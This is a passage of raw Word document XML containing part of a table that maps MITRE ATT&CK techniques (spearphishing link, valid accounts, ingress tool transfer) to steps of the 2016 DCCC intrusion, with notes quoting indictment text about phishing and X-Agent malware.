                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A221B29" w14:textId="77777777" w:rsidR="00285F73" w:rsidRPr="002D1D50" w:rsidRDefault="00285F73" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B61437" w:rsidRPr="00B857D7" w14:paraId="26BED16F" w14:textId="77777777" w:rsidTr="008D2933">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0175669B" w14:textId="77777777" w:rsidR="00B61437" w:rsidRDefault="00B61437" w:rsidP="00B61437">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FEE095A" w14:textId="77777777" w:rsidR="00B61437" w:rsidRPr="00B857D7" w:rsidRDefault="00B61437" w:rsidP="00B61437">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39E96849" w14:textId="77777777" w:rsidR="00B61437" w:rsidRPr="00B857D7" w:rsidRDefault="00B61437" w:rsidP="00B61437">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D81EFA">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>566.002</w:t>
            </w:r>
            <w:r w:rsidRPr="00D81EFA">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D81EFA">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F308BD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">Phishing: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F308BD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Spearphishing</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F308BD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Link</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A528C67" w14:textId="77777777" w:rsidR="00B61437" w:rsidRPr="00B857D7" w:rsidRDefault="00B61437" w:rsidP="00B61437">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5BE11F56" w14:textId="77777777" w:rsidR="00B61437" w:rsidRPr="00B857D7" w:rsidRDefault="00B61437" w:rsidP="00B61437">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="667C10DD" w14:textId="77777777" w:rsidR="00B61437" w:rsidRDefault="00B61437" w:rsidP="00B61437">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="409FDA55" w14:textId="097CB39E" w:rsidR="00B61437" w:rsidRPr="00B857D7" w:rsidRDefault="00B61437" w:rsidP="00B61437">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEL/IF-SEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50FB6A9F" w14:textId="05F65B52" w:rsidR="00B61437" w:rsidRDefault="00B61437" w:rsidP="00B61437">
            <w:r>
              <w:t xml:space="preserve">[1] 24 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="583629C1" w14:textId="77777777" w:rsidR="00B61437" w:rsidRDefault="00B61437" w:rsidP="00B61437">
            <w:r>
              <w:t xml:space="preserve">Employee 1 had received a </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>spearphishing</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> email from the Conspirators on or about </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F87C5DF" w14:textId="6684A00B" w:rsidR="00B61437" w:rsidRPr="00D81EFA" w:rsidRDefault="00B61437" w:rsidP="00B61437">
            <w:r>
              <w:t>April 6, 2016</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B61437" w:rsidRPr="00B857D7" w14:paraId="37C3B49F" w14:textId="77777777" w:rsidTr="008D2933">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="637FFFB3" w14:textId="77777777" w:rsidR="00B61437" w:rsidRDefault="00B61437" w:rsidP="00B61437">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="408156AF" w14:textId="77777777" w:rsidR="00B61437" w:rsidRPr="00B857D7" w:rsidRDefault="00B61437" w:rsidP="00B61437">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2408" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3CE75D8D" w14:textId="77777777" w:rsidR="00B61437" w:rsidRPr="001F175E" w:rsidRDefault="00B61437" w:rsidP="00B61437">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12FCCC3B" w14:textId="77777777" w:rsidR="00B61437" w:rsidRDefault="00B61437" w:rsidP="00B61437">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0733BD64" w14:textId="77777777" w:rsidR="00B61437" w:rsidRPr="00B857D7" w:rsidRDefault="00B61437" w:rsidP="00B61437">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66F56384" w14:textId="77777777" w:rsidR="00B61437" w:rsidRDefault="00B61437" w:rsidP="00B61437">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6EF7B603" w14:textId="77777777" w:rsidR="00B61437" w:rsidRPr="00B857D7" w:rsidRDefault="00B61437" w:rsidP="00B61437">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="300E82FB" w14:textId="77777777" w:rsidR="00B61437" w:rsidRPr="00C5122C" w:rsidRDefault="00B61437" w:rsidP="00B61437">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Credential access achieved on external system (via link)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B61437" w:rsidRPr="00B857D7" w14:paraId="6EB705A6" w14:textId="77777777" w:rsidTr="008D2933">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01754580" w14:textId="77777777" w:rsidR="00B61437" w:rsidRDefault="00B61437" w:rsidP="00B61437">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0AF7FF7E" w14:textId="77777777" w:rsidR="00B61437" w:rsidRPr="00B857D7" w:rsidRDefault="00B61437" w:rsidP="00B61437">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67113CE5" w14:textId="77777777" w:rsidR="00B61437" w:rsidRPr="00B857D7" w:rsidRDefault="00B61437" w:rsidP="00B61437">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F175E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="001F175E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1078 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="001F175E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Valid Accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B5A0468" w14:textId="77777777" w:rsidR="00B61437" w:rsidRPr="00B857D7" w:rsidRDefault="00B61437" w:rsidP="00B61437">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6767D874" w14:textId="77777777" w:rsidR="00B61437" w:rsidRPr="00B857D7" w:rsidRDefault="00B61437" w:rsidP="00B61437">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15E7CFB5" w14:textId="77777777" w:rsidR="00B61437" w:rsidRDefault="00B61437" w:rsidP="00B61437">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79180600" w14:textId="100363AE" w:rsidR="00B61437" w:rsidRPr="00B857D7" w:rsidRDefault="00B61437" w:rsidP="00B61437">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-EXP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55426204" w14:textId="0B1BA9B6" w:rsidR="00B61437" w:rsidRPr="00B857D7" w:rsidRDefault="00B61437" w:rsidP="00B61437">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C5122C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[1]</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">… </w:t>
            </w:r>
            <w:r>
              <w:t>,</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> and entered password after clicking on the link.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00285F73" w:rsidRPr="00B857D7" w14:paraId="5D529FA0" w14:textId="77777777" w:rsidTr="008D2933">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E60951B" w14:textId="77777777" w:rsidR="00285F73" w:rsidRDefault="00285F73" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A452AE9" w14:textId="0AB080FB" w:rsidR="00285F73" w:rsidRPr="00B857D7" w:rsidRDefault="00285F73" w:rsidP="008D2933">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w:t>
            </w:r>
            <w:r w:rsidR="008D5538">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Co</w:t>
            </w:r>
            <w:r w:rsidR="008D5538">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>mmand and Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2408" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A8C2176" w14:textId="64D8DB25" w:rsidR="00285F73" w:rsidRPr="00B857D7" w:rsidRDefault="00285F73" w:rsidP="008D2933">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w:t>
            </w:r>
            <w:r w:rsidR="008D5538">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>05</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="008D5538">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Ingress Tool Transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5CEC6629" w14:textId="77777777" w:rsidR="00285F73" w:rsidRPr="00B857D7" w:rsidRDefault="00285F73" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="741818DE" w14:textId="77777777" w:rsidR="00285F73" w:rsidRPr="00B857D7" w:rsidRDefault="00285F73" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B7F0504" w14:textId="77777777" w:rsidR="00285F73" w:rsidRDefault="00285F73" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32F05AC6" w14:textId="603085B3" w:rsidR="00285F73" w:rsidRPr="00B857D7" w:rsidRDefault="00B61437" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E0A56BD" w14:textId="77777777" w:rsidR="008D5538" w:rsidRPr="008D5538" w:rsidRDefault="00285F73" w:rsidP="008D5538">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidR="008D5538" w:rsidRPr="008D5538">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Between in or around April 2016 and June 2016, the Conspirators installed multiple</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DAE83AD" w14:textId="77777777" w:rsidR="008D5538" w:rsidRPr="008D5538" w:rsidRDefault="008D5538" w:rsidP="008D5538">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008D5538">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>versions of their X-Agent malware on at least ten DCCC computers, which allowed</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4AFE56CB" w14:textId="77777777" w:rsidR="008D5538" w:rsidRPr="008D5538" w:rsidRDefault="008D5538" w:rsidP="008D5538">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008D5538">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">them to monitor individual employees’ computer activity, steal passwords, and </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="357825E5" w14:textId="1A548683" w:rsidR="00285F73" w:rsidRPr="00842B32" w:rsidRDefault="008D5538" w:rsidP="008D5538">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008D5538">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>maintain access to the DCCC network</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004D2E05" w:rsidRPr="00B857D7" w14:paraId="07A79B68" w14:textId="77777777" w:rsidTr="008D2933">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="45C2AA5F" w14:textId="4A0DD716" w:rsidR="004D2E05" w:rsidRDefault="00A674EB" w:rsidP="004D2E05">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="580ED1E8" w14:textId="154CE33F" w:rsidR="004D2E05" w:rsidRPr="00B857D7" w:rsidRDefault="004D2E05" w:rsidP="004D2E05">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08" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B97917D" w14:textId="43D8D75E" w:rsidR="004D2E05" w:rsidRPr="00B857D7" w:rsidRDefault="008001A4" w:rsidP="004D2E05">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10B54AF2" w14:textId="15C23E65" w:rsidR="004D2E05" w:rsidRPr="00B857D7" w:rsidRDefault="004230DB" w:rsidP="004D2E05">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1608D3EC" w14:textId="77777777" w:rsidR="004D2E05" w:rsidRPr="00B857D7" w:rsidRDefault="004D2E05" w:rsidP="004D2E05">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BB6CC70" w14:textId="09DFA9BB" w:rsidR="004D2E05" w:rsidRDefault="004D2E05" w:rsidP="004D2E05">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
